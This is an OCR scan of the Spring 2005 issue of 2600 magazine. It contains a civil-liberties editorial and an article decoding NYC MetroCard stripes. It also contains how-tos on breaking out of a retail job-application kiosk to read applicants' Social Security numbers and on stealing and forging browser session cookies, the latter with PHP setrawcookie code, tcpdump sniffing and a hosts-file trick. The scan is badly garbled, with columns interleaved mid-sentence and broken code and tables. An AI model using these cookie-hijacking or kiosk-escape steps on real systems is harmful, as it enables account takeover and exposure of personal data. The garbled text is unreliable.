P. 1
2600_The Hacker Quarterly_Spring 2005_XX000013242XX 29597

2600_The Hacker Quarterly_Spring 2005_XX000013242XX 29597

|Views: 1,136|Likes:
Published by hexram

More info:

Published by: hexram on May 07, 2009
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less





Alicante, Spain. A standard ghenc throughout t h e country. I t takes credit cards and coins.

I n addition this phone has SMS and fax capabilities.


eril&d by

coin $ W a s w&mflkr

n TI& me .


I T Jlholl..


For more exciting foreign payphone photos, take a Look a t the inside back cover!



and say, it lately seems t h a t it would be t h e endless f i g h t against t h e increasing restrictions of our society. Whether it's t h e Latest government crackdown on something t h a t wasn't even a crime a decade ago o r another corporate lawsuit against someone whose actions would have seemed completely harmless i n another time or place, we cannot seem t o shake this perpetual f i g h t we're forced into. And, Like most things, there i s good and bad i n this fact. Fighting i s good. It keeps you awake and redefines what it is you stand for. Done properly, it can also open up a l o t of eyes and bring a great number of people i n t o t h e battle, hopefully on your side. But becoming a constant victim of what's going on around you isn't at a l l constructive. I n some ways we seem t o always expect things t o get worse and when they do we're not surprised. And with that, we Lose our outrage and replace it with resignation. We need t o do everything i n our power t o avoid falling i n t o t h a t latter category. That's what we hope t o accomplish i n these pages - t o challenge, t o ask questions, t o n o t be intimidated i n t o acquiescence. The only reason we've survived this long is because our readers have been there t o encourage us and t o prove t h a t what we say and what we do actually counts for something. It's important t o extend t h a t reassurance a l l throughout t h e community - individually and collectively - so t h a t we n o t only survive but grow stronger. I n this way it w i l l i n deed be possible t o reverse the tide and build something positive. We a l l derive a fair amount o f pleasure i n listing t h e latest negative trends i n our society. So let's take a little time t o focus on some o f the highlights. The recent actions o f t h e Federal Communi cations Commission have been quite frighten i n g i n their zeal t o restrict and punish speech t h a t they disapprove of. Because of t h e trauma , suffered due t o the events o f February 1 2004 (when part o f Janet Jackson's breast was mo-

the FCC has made it i t s mission t o become the morality police o f t h e airwaves. Congress has jumped i n on t h e act, apparently frightened by a few crusaders o f decency i n t o thinking t h a t such restrictive views reflect those of t h e nation. Their latest idea i s t o impose fines o f $500,000 for each and every utterance o f a word they disapprove of. While few would support the idea o f turning t h e public airwaves i n t o a bastion o f gutter speech, what these threats have accomplished i s t o instill fear and force broadcasters t o constantly err on t h e side o f caution. Translation: n o controversy, nothing outside t h e norm, and a great deal o f paranoia. The re,sult is a wlhole l o t o f blandness which is far wclrse than an occasional displa y o f bad taste. a u ~ t u > laugh a t absurdities t Lllc We Fraudulent Online Identity Sanctions Act which actually i s being considered by t h e House of Representatives. It's designed t o deal with one of t h e nation's biggest crises: people submitting false information when registering Intern e t domain names. While this i n itself wouldn't be enough t o get you convicted o f a crime (yet), it can be used t o significantly enhance penalties if, for example, someone i s sued over t h e content of a web page. Many whistle-blower and dissident websites would f i n d it impossible t o operate if they had t o do so while giving out their realidentities and locations. Yet such sites provide a very valuable service t o t h e public. By adding this intimidation, it suddenly becomes a potential crime t o t r y and remain anonymous. Equally absurd i s a new law passed i n Utah t h a t requires Internet service providers t o keep track o f and provide a way t o block access t o porno!graphic websites. While this may sound attracti v e t o a politician or a media outlet seeki n g t o whip up hysteria, this has always been something t h a t a user could easily implement with varying degrees o f success using different types o f software. But now t h e ISP i s being expected t o take on this responsibility, somehow


/keeping track of every website i n the world that has material deemed "harmful t o minors" and facing felony charges i f they don't block access t o them on demand. The mere creation and distribution of such a blacklist by the government is an incredible waste of time and effort at best. It's as ridiculous an expectation as what we see i n many restrictive foreign regimes where the realities of the net simply aren't considered i n the face of religious and/or totalitarian zealotry. Like so many other ill-advised bits o f Legislation Lately, the power and responsibility of the individual is being overlooked i n favor of proclamations from governmental agencies who really have no business dictating morality. None of this even begins t o address the evils of the Patriot Act and its proposed successors, legislation drawn up and passed quickly i n the 1 wake of September 1 without debate or analysis of any significance. We've devoted space i n these pages i n the past t o the risks we all face as a result of this monumentally bad idea. No doubt we will continue t o do so i n the future. And this is certainly not something restricted by our borders. Recently the "Anti-Terror Law" was finally passed i n Britain after much debate. This new law allows the authorities to detain British citizens as well as foreigners indefinitely and without charge i f they are "terrorist suspects," a classification which no doubt will be bent i n all sorts of imaginative directions t o suit the accusers. It also becomes the only country i n the European Union t o suspend the right t o a fair trialin such circumstances. About the only bit of positive news t o come out of this is that extensive debates won the right t o have this law reviewed and possibly repealed i n 2006. Again, we are reminded of what Ben Franklin once said: "Those who would give up essential liberty for temporary safety deserve neither liberty nor safety." I n a quote that seems t o fit this categorization remarkably well, Prime Minister Tony Blair said, "Those considerations of national security have t o come before civil liberties however important they are." When you look closely at these trends and those that we have been covering over the years, it becomes clear that most of them have nothing t o do with September 11, threats of attack, wars and invasions, or anything else that we've lately become obsessed with. Rather, these incidents have become excuses for pushing policies that have been i n the works for years. The element of fear that is constantly

bombarding us is the best thing t h a t could have\ happened for those who want more control, more surveillance, and a crackdown on dissent. When all is said and done, it's clear who the real enemy of the people is. While the mass media, government, and corporate world would Like that enemy t o be those who challenge the system, we believe they're i n for a disappointment. That designation belongs t o those who are hard at work dismantling t h e freedoms that we have a l l aspired t o i n the interests of "security" or because they feel they have Lost control. It's clear that they should Lose control because it's obvious that power i n their hands i s not a good thing at all. The fact is most people get it. They have little problem dealing with controversy, differing opinions, or common sense. They don't need t o be talked down t o or have their hands held at every step of the way. Most people understand that the world they Live i n isn't Disneyland and that an adult society doesn't have t o be reduced t o a child's level i n order t o be safe. But too many of these same people don't step up when others try and restrict what they can say, do, read, access, or even think. Maybe they assume someone else will do this for them. Maybe they think they're actually i n the minority and ought t o stay quiet for the purpose o f self-preservation. Or perhaps they just don't take any of these people seriously and are content t o laugh at them from the sidelines. ALL o f these are precisely the reactions that t h e control seekers want more than anything. "ALL that is required for evil t o triumph is for good men t o do nothing." We can't fall into that trap. What can we do? It's really simple. Unity on these issues is all we need. Wherever you find yourself i n today's world, you have a voice and you can reach and influence people on all different levels. All it takes is t h e desire t o do this and a Little persistence. Educate yourself on the issues and why they matter. Bring it up at your place or work, i n your school, t o your parents, friends, or children. Don't be shrill or offensive. Put yourself i n the position o f other people and inject your insight into the equation so that you can effectively communicate why the issues that matter t o you should also matter t o them. This is how movements are born. And that is what we need if we hope t o escape what is looming on the horizon.

"If tyranny and oppression come to this land, it

will be in the guise o f figh ting a foreign enemy. - James Madison.


2 Floweilield, St. James, N 11780. Y Periodicals postage paid a t St. James, NY and additional offices.

POSTMASTER: Send address changes t o 2600, P.O. Box 752 Middle Island, NY 11953-0752. Copyright (c) 2005 2600 Enterprises, Inc. YEARLY SUBSCRIPlION: U.S. and Canada - $20 individual,$50 corporate (US. funds). Overseas - $30 individual, $65 corporate.


Back issues available for 1984-2004 at $20 per year, $26 per year overseas. Individualissues available from 1988 on at $5.00 each, $6.50 each overseas.


ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO: 2600 Subscription Dept., P.O. Box 752 Middle Island, NY 11953-0752 (subs@2600.com). FOR LEllERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99 Middle Island, NY 11953-0099 (Letters@26OO.com, articles@2600.com). 2600 Office Line: 6 3 1 - 7 5 1 - 2 6 0 0 2600 FAX Line: 6 3 1 - 4 7 4 - 2 6 7 7

. .


- .

include reduced-fare cards, student cards, and employee cards. Single-Track MetroCard. This term will refer t o any I n this article, Iwill explain many of the inner MetroCard that has a one-track magnetic stripe (alworkings of the New York City Transit Authority fare collection system and expose the content of MetroCards. I though there is no visible difference between the stripes of these cards and the stripes of two-track will start off with a description of the various devices of cards). The following types of cards are single-track: the fare collection system, proceeding into the details Single-Ride and Bus Transfer MetroCards. of how t o decode the Metrocard's magnetic stripe. This Dual-Track MetroCard. This term will refer t o a l l article is the result of many hours of experimentation, MetroCards with the exception o f the Single-Track plenty of cash spent on MetroCards (you're welcome, MetroCards mentioned above. The following types of MTA), and Lots of help from several people. I'd like t o cards are some examples of dual-track cards: pay-perthank everyone at 2600, O f f The Hook, and all those ride, pre-valued, unlimited, and reduced-fare. who have mailed i n cards and various other informaPassback Period. This term w i l l refer t o the time petion. riod before an access device will allow you t o use an unBecoming familiar with how magnetic stripe techlimited card again after swiping it. During this period, nology works will help you understand much of what is the devices generally respond with t h e message "JUST discussed i n the sections describing how t o decode USED". MetroCards. More information on this, including addiStandard Cards and Standard Readers. These terms tional recommended reading, can be found i n "Magw i l l refer t o cards containing a magnetic stripe (credit, netic Stripe Reading," also i n this issue. banking, etc.) or readers of these cards that conform t o Terms the standards set forth i n any or all o f the following IS0 These terms will be used throughout the article: specifications: 7810, 7811, 7813, and 4909. FSK - Frequency Shift Keying. A type of frequency Cubic Transportation Systems modulation i n which the signal's frequency is shifted The fare collection system t h e MTA uses was between two discrete values. developed by Cubic Transportation Systems, a MVM - MetroCard Vending Machine. MVMs can be subsidiary of Cubic Corporation. The patents I found t o found i n every subway station. They are the large vendbe related t o the current New York City system filed by ing machines which accept cash i n addition t o credit Cubic Corporation are as follows: and debit. 4,877,179 - Farebox S e c u r i t y D e v i c e MEM - MetroCard Express Machine. MEMs are vend5,056,261 - T u r n s t i l e System ing machines that accept only credit and debit. They are 5,072,543 - T u r n s t i l e Mechanism 5 , 1 9 1 , 1 9 5 - F a r e Card R e a d - W r i t e r Which often located beside a batch of MVMs. -Overwrites Oldest o r Invalid Data MTA - Metropolitan Transportation Authority. A 5,215,383 - T i c k e t S t o c k and T i c k e t D i s p e n s e r I public benefit corporation of the State of New York re5 , 2 9 8 , 7 2 6 - F a r e Card R e a d - W r i t e r Which -Overwrites Oldest o r Invalid Data sponsible for implementing a unified mass transporta5 , 3 3 3 , 4 1 0 - C o n t r o l l a b l e B a r r i e r S y s t e m For I tion policy for New York City and counties within the - P r e v e n t i n g Unpaid A d m i s s i o n t o a Fee-Paid Area "Transportation District." 5 , 5 7 4 , 4 4 1 - Mass T r a n s i t I n d u c t i v e D a t a -Communication S y s t e m NYCTA - New York City Transit Authority. Under the 5 , 6 1 2 , 6 8 4 - Mass T r a n s i t I n d u c t i v e D a t a control of the MTA, the NYCTA is a public benefit corpoCCommunication System ration responsible for operating buses and subway 6 , 5 9 5 , 4 1 6 - S y s t e m For R a p i d l y D i s p e n s i n g and -Adding Value t o Fare Cards trains i n New York City. 6,655,587 - Customer A d m i n i s t e r e d A u t o l o a d RFM - Reduced-Fare MetroCard. RFMs are available 6,789,736 - D i s t r i b u t e d A r c h i t e c t u r e For t o the elderly or people with qualifying disabilities. ,Magnetic Fare Card P r o c e s s i n g Typical RFM fare is half or less than half of the standard Servicing, apart from routine collection o f fare. fares, on MTA equipment seems t o be done by Common MetroCard. This term will refer t o any Cubic employees, not the MTA. MetroCard available t o the public without special reThe MetroCard System quirements. Examples include standard pay-per-ride At the core of the MTA fare collection system cards, standard unlimited cards, and single-ride cards. i s t h e MetroCard. Preceded by a token-based sysSpecial MetroCard. This term will refer t o any Metroi Card not available t o the general public. Examples tem, the MetroCard i s n o w used for every aspect

by Redbird redbird@2600.com



\ fare collection and allows for fare options that would never have been previously possible (e.g., Employee, Reduced-Fare, and Student MetroCards). MetroCards can currently be purchased a t MVMs, MEMs, token booths, and various merchants throughout the New York City area. I categorize t h e will Metrocard access devices into two types: reading devices and fare collection devices. Both of these devices are networked i n a complex system which allows the MTA, within minutes, t o have up-to-date information on every card that has been issued. This also allows them t o disable any card at will. The hierarchy of the network i s shown below (as described i n patent 6,789,736).






!nKENsooTW.Eaur9?ENz ....Z.....Z......



The physical characteristics o f MetroCards follow those of standard cards (see Terms) almost exactly, but are one third the thickness. They have a diagonal notch cut out i n the upper-right hand corner 3 1/8" from the Left and 5/16" from the top of the card. Additionally, they have a 1/8" diameter hole, with its center 1/4" from the left and 5/16" from the top of the card, which is used t o aid machines that suck your card i n (bus fare boxes, MEMs/MVMs, handicapped entry/exit machines, etc.). Vending Machines MEMs and MVMs are Located throughout the subway system. They allow you t o purchase or refill various common MetroCards with either cash or a credit card. RFMs can't be purchased at machines but can be refilled. On the front of the MEM or MVM i s a tag with the machine's unique I D number. The BIOS System Configuration screen from an MEM looks Like this:
AMIBIOS S y s t e m C o n f i g u r a t i o n ( C ) 1 9 8 5 - 1 9 9 7 , Main P r o c e s s o r Math P r o c e s s o r F l o p p y D r i v e A: F l o p p y D r i v e B: AMIBIOS D a t e Processor Clock
: Celeronftm)

American Meqatrends Inc.,
: 640KB : 14336XB
: : : :

:Built-In : None : None : 07/15/95 : 3 0 0 A MHz

B a s e Memory S i z e E x t . Memory S i z e Display Type Serial Port(s) Parallel Port(s) E x t e r n a l Cache Size 5729MB LBA Mode LBA

VGA/EGA 3F8,2F8 378 128KB,Enabled Block Mode 16Sec PI0 Mode 4

ATA(P1) D e v i c e ( s ) T y p e Primary Master PC1 PC1 PC1 PC1
: Hard D i s k

32Bit Mode On

Devices: Onboard B r i d g e D e v i c e Onboard IDE Onboard VGA

PC1 O n b o a r d USB C o n t r o l l e r , I R Q l l PC1 O n b o a r d E t h e r n e t , I R Q l 5

FPGA ver. C , B a s e A d d r e s s : BSP CPU.. M i c r o c o d e OK



I have no reason t o believe that the MVM hardware is any different.
t b 0 0



Receipts can be obtained from MEM and MVM machines by answering "yes" when prompted. They possess a lot of information about the MEM/MVM, subway station, and card. You can match a receipt t o a card by comparing the serial numbers. Let's take a look at some samples:




MVM #:

#: 0 5 4 5 f R 2 1 9


0 5 0 0 ) MEM #:

5383(N513 0 4 0 0 )

T r a n s : S a l e OK P a y m e n t Mode: C a s h $ 7.00 Amount : $ 0.00 Card Value: C h a n g e Due: $ 3.00 S e r i a l #:I059909877 Type: 023 1 -DAY UNLIMITED Questions? C a l l ( 2 1 2 ) METROCARD

T r a n s : S a l e OK P a y m e n t Mode: C r e d i t Amount : $ 21.00 $ 0.00 Card Value: C r e d i t C a r d #: XX5346 Auth#: 0 0 0 0 0 8 R e f #: 0 6 0 6 1 5 7 6 2 1 2 9 S e r i a l #: 1 0 2 7 0 6 6 8 4 8 T y p e : 024 7-DAY UNLIMITED Questions? C a l l ( 2 1 2 ) METROCARD

T r a n s : Add T i m e OK Amount : $ 10.50 I n i t i a l Type:030 7-DAY RFM UNLIMITED Time Added: 030 7-DAY RFM UNLIMITED ATM C a r d #: XX0952 Auth#: 7 6 0 3 4 6 R e f #: 0 2 9 0 8 9 5 5 9 6 6 8 S e r i a l #:0987218036 Questions? C a l l ( 2 1 2 ) METROCARD

Most o f the information on t h e receipt i s fairly obvious, but notice the line t h a t begins with "MEM #" or "MVM # .The first four digits correspond t o the actual MEM or MVM I D number as found on t h e machine. The next Letter and following three digits inside the parenthesis correspond t o t h e closest token booth. This ID can also be found on the booth itself. The meaning of t h e next f o u r digits i s currently unknown. However, they are unique t o each machine that has the same b o o t h ID, but are not unique among machines with different booth IDS. They seem t o simply be a unique I D for each MEM/MVM i n the station, possibly grouped by location. See "MEM/MVMsH for a table. Now Look t o the bottom of the receipt. The Line t h a t begins with "Type:" (or " I n i t i a l Type:" if an RFM is being refilled) gives the numerical card subtype value followed by a description o f t h e type on the following Line. Receipts purchased with a credit card contain additional fields that allow t h e MTA t o verify the credit card holder i n the case that he/she decides t o Lose t h e MetroCard.

The use of a turnstile i s the most common way t o enter the subway. Entry i s granted by swiping a valid MetroCard through the readerjwriter located on the outside of each turnstile. Once swiped, the LCD display on the turnstile will display a message. Some common messages: GO. Message displayed for Unlimited MetroCards. GO. I RIDE LEFT. Message displayed for Student MetroCards, where "1"is the number o f rides Left for the day. JUST USED. The passback period for the Unlimited MetroCard i s not up. GO. 1XFER OK. Message displayed when transferring from a bus. Above the LCD there are a series of round indicators. Of these, one has an arrow pointing i n the direction of the turnstile i n which you would enter after paying your fare, and another reads "No" and a do-not-enter bar which, when lit, indicates that the turnstile is not active. After paying your fare, another indicator below the green arrow lights t o indicate that you may proceed through t h e turnstile without smashing your groin i n t o the arm. Above those, there are three horizontal bar indicators contained within a rectangular cutout. When a Reduced-Fare MetroCard is swiped, the top indicator (red) will light. When a Student MetroCard i s swiped, the middle indicator (yellow) will Light. When an Employee MetroCard i s swiped, t h e bottom indicator (the color of which I ' m unsure of) w i l l light. These indicators are present on both sides of the turnstiles and they allow transit cops, many o f whom are undercover, t o monitor t h e types o f cards bei n g used by riders. This helps detect, for example, when Student MetroCards are being used a t times when school is not i n session or when an obvious misuse o f an Employee or Reduced-Fare MetroCard occurs.



Reading MetroCards MetroCards are relatively difficult t o read. You will not be able t o read them with off-the-shelf magnetic stripe readers, so please don't waste your money. The reason for this i s not t h a t the format i s different; MetroCards use Aiken Biphase (also known as frequency shift keying (FSK)) just like standard cards. However, the hardware that ships with these readers is designed for a completely different (and well-documented) specification. They require many "clocking bits," which consist of a string o f zerobits at the beginning of the stripe t o aid i n setting a reference frequency for decoding. Additionally, most readers also look for a standard start and end sentinel that exists on standard cards t o denote the start of a particular track. On top o f that, characters on these cards are defined as either four or six b i t blocks (depending on the track) and contain a longitudinal redundancy check (LRC) character after the end sentinel t o verify data integrity. Needless t o say, MetroCards don't have any of these properties and contain fields of arbitrary length; thus, another method of reading and decoding i s required. Fortunately, magnetic heads are everywhere (e.g., cassette tape players) and the output from magnetic heads when passed over a magnetic stripe consists of voltage spikes i n the audible frequency range. Since sound cards are excellent A/D converters for this range of input and are readily available and very cheap, we can use the microphone input interfaced t o a magnetic head for the purpose of creating our own reader (for a l o t less than the MTA i s paying, I'm sure!). See the article "Magnetic Strioe Readina" i n this issue for more details. For the same reason t h a t reading was initially difficult, writing t o MetroCards i s extremely difficult, and is still a work-in-~roqresswhich will not be discussed i n this article. A techniaue similar t o that of t h e decoder (in reverie) ;an be used t o write t o cards, although it i s much more difficult t o implement and obviously requires more equipment than just a sound card and a magnetic head. For those of you who realize how this can be done and have the ability t o build the equipment, kudos, but keep i n mind the ramifications of being caught using a card you wrote t o yourself. Modifying the data on cards does work. But the MetroCard system is very complex and allows for the surveillance of this sort of activity. The goal of this project i s t o learn how the system works, how it can be theoretically defeated, but certainly not t o get stuck i n prison. Apart from these difficulties, MetroCard tracks are defined as follows: Dual-Track MetroCards have two tracks - one track being twice the width of the other - and will be referred t o as track 1-2 and track 3; Paper MetroCards have one track which will be referred t o as track 1-2. These track names (as I refer t o them) correspond t o the same track fields t h a t have been established by IS0 7811. Decoding Dual-Track MetroCards Track 3 Track 3 on Dual-Track MetroCards contains static data. It i s written when the card is produced and the serial number is printed on the back, and i s not written t o thereafter by any machine. Some data found on this track can also be found by looking at the information printed on t h e back of the card. The track format is as follows: Track 3 C o n t e n t O f f s e t Length --------------- ------ ------



1: 2: 3: 4: 5: 6:

7: 8: 9: 10: 11:

Start Sentinel Card Type Unknown E x p i r a t i o n Date Unknown Constant unknown S e r i a l Number Unused Unknown End S e n t i n e l

0 15 19 23 35 39 47 55 135 151 167

15 4

12 4 8 8 80 16 16 93

Decoding track 3 is accomplished as follows: I. Constant: OOOOOOOllOOOlZl 2. Convert binary t o decimal * See "Card Types" for a lookup table. 3. Use is n o t y e t known 4. To determine the expiration date for common MetroCards: * Convert binary to decimal * Divide the decimal value b y 2, round up * Convert the decimal value to year/month format as follows: o Year: Integer value o f the decimal value divided by 12 o Month: Value o f the modulus o f the decimal value and 12 * A d d 1992 to the year






* The expiration date is the last day o f the previous month * Note: Non-common MetroCards seem to have different date

* Note: This expiration date is the date the physical card can
no longer be used and is considered invalid. See the track 1-2 expiration date field for more information. 5. Use is notyet known 6. Constant: 00001101 7. Use is not yet known 8. Convert binary to decimal 9. Unused field 10. Use is not yet known 11. Constant: 00100101001100100110100101100101010011001010010 1001100110101010011010010101001101001010110101

Decoding Dual-Track MetroCards Track 1-2 Track 1-2 on Dual-Track MetroCards contains variable data. It i s written t o by every machine used for fare collection, reading devices excluded. Interestingly enough, track 1-2 does n o t only contain i n formation pertaining t o the last use, but also t o the use before that. These two records are separated by a strange set of field separating bits, which contains i n it a b i t t h a t seems t o be h a l f o f t h e one-bit frequency (which i s a non-standard use of FSK). The most reliable way t o find t h e second track i s t o search for a second start sentinel, both o f which are identical for each record. The track format i s as follows:
Content Start Sentinel Time Card Sub-Type Time Date T i m e s Used E x p i r a t i o n Date Transfer B i t L a s t Used ID C a r d Value P u r c h a s e ID Unknown Offset


Decoding track 1-2 is accomplished as follows: 1. Constant: O O l l O l O l l l 2. See 4 3. Convert binary to decimal * The card sub-type corresponds to the sub-type as indicated on the receipt if one was obtained from an MEM/MVM. * See "Card Types" for a lookup table. 4. To deal with the limited storage space on the Metrocard stripe, each bit in this field and field (2) represents 6 minutes. To determine the last time used for common MetroCards: * Concatenate the binary from (2) with the binary from this field Convert to decimal * Multiply decimal value by 6 * Result is the number of minutes since 01:OO that the card was last used 5. Convert binary to decimal This field contains the last usage date, which can be determined by calculating an offset based on a card o f the same type with a last usage on a known date. However, since this field only has 10 bits, dates will most likely roll overafter 1024 (2"IO) days anda new ofr4et will have to be determined. Offsets also seem to differ with different types of MetroCards. 6. Convert bina ry to decimal * The times used field is incremented every time you use the


card to pay a fare except during a transfer. I n that case, the transfer bit is set and the times used field remains the same. 7. Convert binary to decimal * Determine offset based on the description in 5 to determine the exact expiration date o f a card. Alternatively, subtract the date field from this field to determine how many days after the last usage the card expires. * Do not confuse this field with the expiration date field on ; track 3 it is only used on cards which expire a set number of days afteryou first use them (e.g., unlimited cards) and will not be set for cards such as pay-per-ride which do not have an expiration date. 8. Bit is 1 i f the last use was for a transfer, 0 otherwise 9. Convert binary to decimal * This field seems to have a completelyseparate lookup table that is used internally by the fare collecfion system. * See "Last Used IDS" for a lookup table. 10. Convert binary to decimal * The result is the value remaining on the card in cents. 11. Convert binary to decimal This field seems to have a completelyseparate lookup table that is used internally by the fare collection system to match the value of this field with an MVM ID number (such as those you can find on receipts).

Card T y p e s ( p a r t i a l ) Type Subtype Description 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 4 4 0 10 12 13 14 19 23 24 25 26 29 30 43 46 47 48 56 57 59 62 87 2

---- ------- ----------FULL FARE PRE-VALUED PRE-VALUED ( $ 1 0 . 0 0 ) PRE-VALUED ( $ 2 . 0 0 ) L o n g I s l a n d R a i l Road PRE-VALUED ( $ 4 . 0 0 ) 1-DAY UNLIMITED ( $ 2 . 0 0 f a r e ) 7-DAY UNLIMITED ( $ 2 . 0 0 f a r e ) 7-day E x p r e s s Bus U n l i m i t e d ($4.00 f a r e ) 30-DAY UNLIMITED ( $ 2 . 0 0 f a r e ) AIRTRAIN 7-DAY RFM UNLIMITED ( $ 2 . 0 0 f a r e ) TransitChek TransitChek TransitChek T r a n s i t C h e k 30-DAY UNLIMITED 1-DAY UNLIMITED ( $ 1 . 5 0 f a r e ) 7-DAY UNLIMITED ( $ 1 . 5 0 f a r e ) 30-DAY UNLIMITED ( $ 1 . 5 0 f a r e ) SingleRide ($1.50 f a r e ) S i n g l e R i d e ($2.00 f a r e ) Two-Trip S p e c i a l Program P a s s G r a d e s 7-12 1 / 2 F a r e - G r a d e s K-12


L a s t U s e d IDS ( p a r t i a l ) ID Location -- - ----- 1513 1 4 t h S t / U n i o n Sq 1519 8 t h St/Broadwav tA39) 1880 L e x i n g t o n Ave - ( ~ 6 0 l ) ' 1942 ASTOR PLACE ( R 2 1 9 ) 2157 34th S t / 6 t h Ave (N506) 2204 42nd St/Grand C e n t r a l 2278 9 t h S t r e e t PATH
MEU/ElYMs (partial)
























0982(CO28 5314(HOOl 1358(H007 1145(H007 1632(N010 1 6 1 1 (NO10 5274(N010 0321(N080 0109(N080 0550(N218 0740(N305 1738(N408A 1428(N506 0540(N507 5383(N513 0637(R125 0063(R125 0294(R127 1643(R127 0357(R127 0376(R127 0553(R138 1123(R203 1038(R203 0654(R219 0586(R219 0545(R219 0744(R220 0318(R220 0576(R221 0514(R221 0475(R221 0564(R221 0489 (R227 1228(R229

0700) 0702) 0700) 0701) 0400) 0700) 0701) 0700) 0701) 0700) 0401) 0500) 0702) 0701) 0400) 0700) 0701) 0400) 0401) 0700) 0701) 0701) 0400) 0700) 0400) 0700) 0701) 0700) 0701) 0400) 0401) 0700) 0701) 0701) 0700)

Conclusion As you may have noticed, I haven't provided a way t o decode the Single-Track MetroCards yet. Bus Transfer MetroCards are collected after use and the magnetic stripe of Single-Ride MetroCards i s written with bogus data after use. We simply haven't received enough unused samples t o be able t o reverse-engineer a l l the information contained on these cards.

\ This project is far from over, a n d there are still tons o f data that need t o be collected. You can help i n many ways: * Collect receipts every t i m e you purchase a MetroCard and send them t o us. This w i l l help us expand (and keep updated) our database of the booths and MEMs/MVMs contained within each station. Also, if possible, keep t h e MetroCard associated with t h e receipt. * I f you notice anything unusual, such as a frozen MTA kiosk (MEM, MVM, reader, etc.), open equipment (while repairs are being done), or anything else, take some good pictures. As o f now, photography bans are being proposed for the New York City subway system, b u t are not yet i n place. So know your rights. * I f you're paying for a bus r i d e with change, get a Bus Transfer MetroCard a n d send it t o us if you don't intend t o use it. Make sure you note the route, direction, time, date, a n d any other applicable information. New things are being discovered and more data is being collected every day, so consider this article a "snapshot" o f a work i n progress. You can find and contribute t o t h e data being collected on this system at http://www.2600.com/mta and by sending us additional information a t 2600 Metrocard Project, PO Box 752, Middle Island, NY 11953 USA.

by clorox I'm sure most people searching for a job have filled out an electronic application a t a business on one of their machines. I know about four months ago my friend was looking for a job and I figured I ' d help him find one. No one was hiring so he decided t o t r y a store i n the mall. The store was JC Penney. We were brought i n t o a room with two computers. He sat down and started t o fill out his application and I being the curious one I , am, snooped around. The application itself was an html file t h a t was being shown i n IE i n fullscreen mode. Control-alt-delete did no good so Icontrol escaped , and it brought up the taskbar with the start but\Xpt-ing

ton and the tasktray. The start menu was bare, no way for me t o execute an application there, just a shutdown button. But i n t h e task tray they had Mcafee Antivirus running. I ' m n o t sure if it was a corporate enterprise version b u t Idouble clicked it t o t r y t o find a way Icould access t h e hard drive. There was a field w i t h a browse button next t o it where you could change your virus database and it let me view t h e hard drive as well opened a notepad file as the networked drives. I could see t x t files easier i n t h e browser. just so I I snooping around when I was came upon a folder i n t h e C drive called apps. The text files i n this folder were titled by a opened o n e o f t h e text files nine digit number. I

1 3 1

/and it was Amie Laster's application. Formatted i n this way: ssn-ssns-snn Amie Laster 0000101010101




The others were exactly like this so anyone could just sit down here, access everyone's applications, and pretty much exploit the person using sent an anonymous letter t o the disthis data. I trict office. I'm not sure if it's been fixed or not but I thought that people who are entering i n critical information on a computer need t o know where it is going and who has access t o it. Other places you might find interesting:

BestBuy: On their employee PCs near the CDs, control A and Z three times brings up the employee toolkit (this varies by store but it's a combination of control, alt, or shift with two keys on the keyboard), which you need a login t o use. On the demo PCs you can either double click the numbers on the right hand side or press control M t o minimize the advertisement so you can access the drive. Their laptops usually have Internet access due t o a wifi connection i n the store. Circuit City: Their PCs are open and have a connection t o the net. The world is yours. Shoutz: z3r0, shady, lucas, mayo, and josh.


Scookievsl l i e 2 - " 8 "; by Vi leSYN $cookievalue3 = "25"; It's 10 pm. Do you know where your cookies are? I'm going t o go over a few ways that cookies setrawcookie ( "password ",$cook can be exploited, and why it's not a good idea t o Wievalue, time()+3600, "/", ".fake.com", keep them i n your browser. I E keeps the cookies 0); i n "\Documents and Settings\O/~UseP/o\Local setrawcookie( "lastvisit ",$cook Settings\Temporary Internet Files", with the file name starting with "Cookie:". Mozilla on the setrawcookie( "userid", $cook other hand saves the "cookies.txt" file i n ~ i e v a l u e 3 , time()+3600, "/", /.mozilla/default/<random>.slt, and Firefox ".fake-com", 0); ? ' stores it i n "/.mozilla/firefox/default.s2e/. Last, safari keeps its ~ o o ~ e s . -/Lii sHere you set three cookies, "password", u file in p ~ t~ "Lastvisit", and "userid". Each cookie i s assigned a sbrary/Cookies/. that we know where they are, the ques- value, an expiration date, a path, a domain, and tion what to do with them. Any of the cookie a boolean secure integer. There i s one trick t o is files can be copied and used with the same type this though. If YOU t r y this code as it is, it w i l l not of browser on a different machine, With the set the cookies. If the browser does not see that snarfed cookies, you can Log into the domains the server resolves t o the domain, it fails. Of course, there are ways around this. You simply that hold cookies and see what data is encapsuedit your "hosts" file, and add a Line like this: lated inside. fake.com Other ways t o capture cookies include using When you navigate t o fake.com/cookie.php, Cain & Abelfrom oxid.it on Windows systems. Another i s t o sniff packets. Using tcpdump or any you will resolve t o yourself, and the cookies will i n front of the doother sniffing utility, monitoring the H l l P port set themselves. With the it's going through and using an unlimited main, a l l hosts are effected by this cookie. You snaplen can show some interesting results. What can then navigate t o the original web server (i.e., you are looking for is this: www.fake.com) and it will recognize the cookie as being there. I f the values came from a legitiSet-Cookie: cookiename=cookievalue; ex mate source, then the server will see the cookies ,pires=expiredate; path=directorypath; as being just as legitimate as long as the expiradomain=domainname.com YOU can then take that information and tion has not been reached. So that's it. Happy forge your own cookies with a PUP file ~narfing! like this: Thanx to FBSDHN, SE, and Dale "The Sandgog<?php gle" Texas. Scookievalue = " I ";

~fe~~:~~&,,t3:~ "'"'




t l a g a z i n e l

by Kong

I was recently hired as a field-network technician at a major cable company. Idon't want t o
